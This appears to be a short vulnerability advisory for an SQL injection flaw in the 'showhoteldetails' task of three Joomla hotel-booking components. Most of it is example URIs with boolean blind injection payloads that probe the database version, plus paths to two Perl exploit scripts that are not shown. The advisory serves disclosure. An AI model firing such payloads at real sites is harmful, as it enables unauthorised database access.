Joomla HBS Multiple Components 'showhoteldetails' SQL Injection Vulnerability

Joomla HBS Multiple Components 'showhoteldetails' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=4 -->FALSE
http://www.example.com/p2/index.php?option=com_tophotelmodule&task=showhoteldetails&id=1 and substring(@@version,1,1)=5 -->TRUE
http://www.example.com/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=5
http://www.example.com/index.php?option=com_lowcosthotels&task=showhoteldetails&id=13+and%20substring(@@version,1,1)=4
http://www.example.com/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=5
http://www.example.com/index.php?option=com_allhotels&task=showhoteldetails&id=1+and%20substring(@@version,1,1)=4

The following exploits are available:

/data/vulnerabilities/exploits/32952.pl
/data/vulnerabilities/exploits/32952-lowcost.pl